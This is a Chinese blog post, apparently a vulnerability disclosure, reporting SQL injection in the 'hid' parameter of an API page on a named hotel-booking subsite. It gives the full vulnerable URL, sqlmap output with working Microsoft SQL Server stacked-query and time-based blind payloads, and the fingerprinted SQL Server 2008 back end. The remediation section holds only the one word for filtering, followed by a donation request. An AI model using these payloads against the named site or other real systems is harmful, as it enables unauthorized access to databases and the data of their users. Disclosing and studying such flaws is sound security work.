2018年04月6日网站服务器迁移完成……

住哪网某分站SQL注入

web防护 苏 demo 1938℃ 0评论

住哪网某分站SQL注入存在注入的地址:

http://www.api.zhuna.cn/e/b.php?agent_id=4159415&agent_md=4ce1f950fbc331f9&uid=0&hid=23078&rid=613489&pid=108191&tm1=2014-09-25&tm2=2014-09-26&style=970,aacbee,e0f5fc,295574&webpath=www.qufou.com#e5e3378c-05da-737f-4649-0aa20fdf4d59其中hid参数存在注入

sqlmap identified the following injection points with a total of 60 HTTP(s) requests:

Place: GET

Parameter: hid

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: agent_id=4159415&agent_md=4ce1f950fbc331f9&uid=0&hid=23078; WAITFOR DELAY ‘0:0:5’–&rid=613489&pid=108191&tm1=2014-09-25&tm2=2014-09-26&style=970,aacbee,e0f5fc,295574&webpath=www.qufou.com

Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: agent_id=4159415&agent_md=4ce1f950fbc331f9&uid=0&hid=23078 WAITFOR DELAY ‘0:0:5’–&rid=613489&pid=108191&tm1=2014-09-25&tm2=2014-09-26&style=970,aacbee,e0f5fc,295574&webpath=www.qufou.com

[22:19:55] [INFO] testing Microsoft SQL Server

[22:19:55] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors

[22:20:01] [INFO] confirming Microsoft SQL Server

[22:20:18] [INFO] the back-end DBMS is Microsoft SQL Server

back-end DBMS: Microsoft SQL Server 2008

[22:20:18] [INFO] fetched data logged to text files under ‘/usr/share/sqlmap/output/www.api.zhuna.cn’

过滤

1

修复方案:

打赏

转载请注明:苏demo的别样人生 » 住哪网某分站SQL注入

   如果本篇文章对您有帮助,欢迎向博主进行赞助,赞助时请写上您的用户名。
支付宝直接捐助帐号oracle_lee@qq.com 感谢支持!
喜欢 (0)or分享 (0)
发表我的评论
取消评论
表情